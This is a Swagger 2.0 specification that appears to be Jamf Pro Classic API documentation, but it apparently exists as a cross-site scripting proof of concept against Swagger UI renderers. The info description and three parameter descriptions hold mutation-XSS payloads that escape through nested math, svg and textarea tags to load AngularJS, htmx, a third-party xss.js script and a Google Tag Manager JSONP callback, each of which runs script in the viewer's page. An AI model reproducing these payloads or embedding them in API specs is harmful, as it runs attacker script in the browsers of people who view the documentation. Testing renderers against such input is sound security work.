swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><script src="https://cdn.jsdelivr.net/npm/angular@1.8.3/angular.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);"></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script src="https://cdn.jsdelivr.net/gh/renniepak/xss/xss.js"></script></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
  '/advancedcomputersearches/id/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script src="https://cdn.jsdelivr.net/npm/htmx.org"></script><any hx-trigger="x[1)}),alert(origin)//]"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - advancedcomputersearches
      operationId: deleteAdvancedComputerSearchById
      summary: Deletes a computer search by id
  '/computers/extensionattributedataflush/id/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script src="https://www.googletagmanager.com/debug/api/vtinfo?gtm_auth=a-0uanYFkML7e3v7Vmxpwg&env_id=env-8&public_id=GTM-TWMCBFD&templates=&callback=alert"></script></form>
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - computers
      operationId: flushComputerExtensionAttributeData
      summary: Deletes data collected by an extension attribute

definitions:
  Account:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  AdvancedComputerSearch:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  Computer:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string

securityDefinitions:
  basicAuth:
    type: basic
tags:
  - description: Operations on Jamf Pro accounts
    name: accounts
  - description: Operations on advanced computer searches
    name: advancedcomputersearches
  - description: Operations on computers
    name: computers
